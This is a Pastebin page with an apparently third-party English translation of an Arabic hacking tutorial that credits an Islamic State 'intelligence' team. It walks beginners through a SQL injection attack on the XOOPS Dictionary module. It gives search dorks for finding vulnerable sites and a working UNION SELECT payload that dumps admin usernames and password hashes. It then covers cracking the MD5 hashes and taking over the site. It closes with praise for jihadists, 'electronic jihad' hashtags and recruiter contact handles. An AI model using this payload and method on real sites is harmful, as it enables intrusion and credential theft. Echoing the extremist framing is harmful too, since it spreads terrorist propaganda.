Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Translation of: https://justpaste.it/Haker9
- --- Arabic ---
- بسم الله الرحمن الرحيم
- درس اليوم تحت رعاية
- المكتب الإعلامي للمخابرات الإسلامية
- -
- فريق نخبة الدولة الاسلامية
- درس اليوم مميز جدا بأذن الله
- --- English ---
- Today's lesson sponsored by media office of the islamic state intelligence service - elite team of the islamic state
- --- Arabic ---
- نروح الى احد مواقع الثغرات الكثيره
- وانا اخترت الميل ورم لانه اسهل واحد
- نفتح الصفحة الرئيسيه للموقع
- هدا الموقع يعرض ملايين المواقع المصابة بالثغرات
- --- English ---
- We go to one of the many vulnerabilities websites and i chosen milworm because it is the easiest one.
- We open the main page of the website, this website exposes millions of sites infected with vulnerabilities.
- --- Arabic ---
- www.exploit-db.com
- الي يهمنا في هذي الصفحة هو اختراق المواقع بما انك مبتدئ
- الثغرات الي لونهم اصفر هذول اليوم
- والي لونهم اخضر يعني اقدم
- وطبعا التاريخ مكتوب على جنب
- انا بختار وحدة من الثغرات الموجوده
- و اخترت هذي الثغره
- --- English ---
- www.exploit-db.com
- What is important for us in this page is breaching sites.
- Since you are a beginner the vulnerabilities in yellow are for today
- and the ones in green mean they are older and of course the date is displayed on the side
- I chose one of the available vulnerabities and i chosen this one:
- --- Arabic ---
- XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
- مكتوب فيها كـ التالي
- كود:
- ##########################################
- #
- # XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
- #
- ##########################################
- #
- ##AUTHOR : S@BUN
- #
- ####HOME : milw0rm - S@BUN
- #
- ####MAİL : hackturkiye.hackturkiye@gmail.com
- #
- ###########################################
- #
- # DORK 1 : allinurl: "modules/dictionary"
- #
- # DORK 2 : allinurl: "modules/dictionary/print.php?id"
- #
- ###########################################
- EXPLOIT :
- modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
- ###########################################
- Dictionary Version 0.94 by nagl.ch
- Dictionary Version 0.91 by nagl.ch
- Dictionary Version 0.70 by nagl.ch
- ###########################################
- ##################S@BUN####################
- ###########################################
- #####hackturkiye.hackturkiye@gmail.com#####
- ###########################################
- --- English ---
- XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
- Written inside as follows the code:
- ##########################################
- #
- # XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
- #
- ##########################################
- #
- ##AUTHOR : S@BUN
- #
- ####HOME : milw0rm - S@BUN
- #
- ####MAİL : hackturkiye.hackturkiye@gmail.com
- #
- ###########################################
- #
- # DORK 1 : allinurl: "modules/dictionary"
- #
- # DORK 2 : allinurl: "modules/dictionary/print.php?id"
- #
- ###########################################
- EXPLOIT :
- modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
- ###########################################
- Dictionary Version 0.94 by nagl.ch
- Dictionary Version 0.91 by nagl.ch
- Dictionary Version 0.70 by nagl.ch
- ###########################################
- ##################S@BUN####################
- ###########################################
- #####hackturkiye.hackturkiye@gmail.com#####
- ###########################################
- --- Arabic ---
- طيب نشرح شوي شوي
- الجزاء الاول
- كود:
- XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
- هذي معلومات عن الثغره
- نوعيتها و وين الثغره موجوده و في اي اصدار
- طيب
- الثغره هذي في سكريبت اسمه XOOPS
- وهذي مجله طبعا
- على اية حال الثغره في dictionary
- الا هو الدليل
- والاصدارات هي
- 0.94-0.91-0.70
- والبيانات الي بتجي هذي غير مهمه بـ النسبه لنا
- وهي معلومات عن مكتشف الثغره
- كود:
- #
- ##AUTHOR : S@BUN
- #
- ####HOME : milw0rm - S@BUN
- #
- ####MAİL : hackturkiye.hackturkiye@gmail.com
- #
- ###########################################
- --- English ---
- Alright we explain slowly the first part
- Code:
- XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
- This information about the vulnerability tells about its type and where it is in which version.
- This vulnerability is within the script called XOOPS and this is a dictionnary (of course "dictionnary") and it is a guide and the publication is 0.94-0.91-0.70 and the data that follows is not important for us it is about the one who discovered the vulnerability, code:
- #
- ##AUTHOR : S@BUN
- #
- ####HOME : milw0rm - S@BUN
- #
- ####MAİL : hackturkiye.hackturkiye@gmail.com
- #
- ###########################################
- --- Arabic ---
- والان اهم جزئين
- الجزاء الاول الدورك
- ###########################################
- كود:
- #
- # DORK 1 : allinurl: "modules/dictionary"
- #
- # DORK 2 : allinurl: "modules/dictionary/print.php?id"
- #
- طبعا شرحت لكم الدورك في شرح سابق
- الدورك مجموعة من الاكواد تضع في محرك البحث وتجيب لك مواقع مصابة ..
- كود:
- allinurl: "modules/dictionary"
- راح يطلع لك كل المواقع الي موجود فيها
- الثغرة
- نختار المواقع وونفز
- كود:
- Southwestern Pennsylvania League of Apparition Technologists - Dictionary
- --- English ---
- And now the most important two sections
- The first section DORK
- Code:
- ###########################################
- #
- # DORK 1 : allinurl: "modules/dictionary"
- #
- # DORK 2 : allinurl: "modules/dictionary/print.php?id"
- #
- Of course i explained to you DORK in a previous explanation
- DORK is a group of scripts put in a search engine and will return a result of infected websites
- كود:
- allinurl: "modules/dictionary"
- You will get all available websites that have this vulnerability we chose and jump to
- Code:
- Southwestern Pennsylvania League of Apparition Technologists - Dictionary
- --- Arabic ---
- نروح الى الجزاء الثاني المهم
- الا وهو
- كود:
- ###########################################
- EXPLOIT :
- modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
- ###########################################
- وهذا كود الإستغلال
- يعني راح ننسخ هذا الكود ونحطه في الموقع الي اخترناه
- وراح يصير رابط الموقع مع الاستغلال كذا
- كود:
- Southwestern Pennsylvania League of Apparition Technologists
- --- English ---
- We go to second important section which is
- code:
- ###########################################
- EXPLOIT :
- modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
- ###########################################
- And this is the code of the exploitation meaning we will copy this code and put it in the site that we have chosen and the url of the site with the exploitation like this
- Code:
- Southwestern Pennsylvania League of Apparition Technologists (Note from #opisis: i think the title is copied here and not the url)
- --- Arabic ---
- /*
- فورا راح يطلع لنا اليوزر والباسوورد لمدير الموقع
- طبعا الموضوع ما ينتهي هنا
- الباسوورد مشفر بـ الـ MD5
- والـ MD5 هذا نوع من انوع التشفير وهو نوعا ما
- لكن البرامج ما قصرت و تقدرو بـ اي برنامج فك باسووردات MD5 انكم تفكو الهاش الي يطلع لكم
- على اية حال الان الباسوورد طلع لنا مشفر مع الاسم
- يعني الباسوورد مشفر والاسم موجود جنبه
- وهم كذا
- ARC-753 : a19010808cc277ac5cc50548d7a61e8e
- الي بـالون الاحمر هذا الباسوورد المشفر
- والي بـ الازرق هذا اسم مدير الموقع الي راح تدخل به لوحة التحكم بعد ما تفك التشفير
- النقطتين الرئسيتين فقط لتفريق بينهم
- بعد ما تفك باسوورد الموقع
- تدخل لوحة تحكم الموقع وتسوي الي يعجبك
- --- English ---
- Straight we will get the username and password of the admin of the site.
- Of course the story doesn't end here.
- The password is encoded with MD5, MD5 is a kind of encoding
- You will find plenty of programs that can decypher MD5 hashed passwords.
- Anyways we got the hashed password and name next to it like this:
- ARC-753 : a19010808cc277ac5cc50548d7a61e8e
- in red is the hashed password and in bleu the name of the admin of the site, that you will use to access the administration panel of the site after you decypher the password and do whatever you want with the site.
- --- Arabic ---
- هكذا تكون انتهت حلقتنا لهذا اليوم علي امل القاء بكم في شرح اخر باذن الله
- مع تحياتي اخوكم هاكر الخلافة - أبو حذيفة السيناوي
- لا اطلب الا النشر وعدم انتزاع حقوق الشرح ..
- --- English ---
- This way we end our session for today in the hope to meet you again for another explanation blablabla
- Salutations your brother Abou (Abu) Houzayfah (Hazifah) Alsinawi (Al Sinawi)
- --- Arabic ---
- انتظرو مني الدرس العاشر في القريب العاجل باذن الله
- في الختام اريد ان اشكر كل مجاهدين الدولة الاسلامية بكل مكان
- الذين يسهرون اليل لينكثو في الكفار والمرتدين
- ويطبقو شرع الله في ارضة المباركة ..
- --- English ---
- Stay tuned for the 10th lesson soon...blablabla
- (Note: below is taken from another paste for reference)
- --- Arabic ---
- اذا واجتكم اي مشاكل راسلوني علي الحساب بتويتر
- @abohhz_14
- او تلجرام
- @abohhz1
- #الجهاد_الالكتروني
- #هاكر_خلافة
- --- English ---
- If you face any problem you can message me on
- twitter: @abohhz_14
- telegram: @abohhz1
- #الجهاد_الالكتروني ( #electronic_jihad)
- #هاكر_خلافة (#khilafah_hacker)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement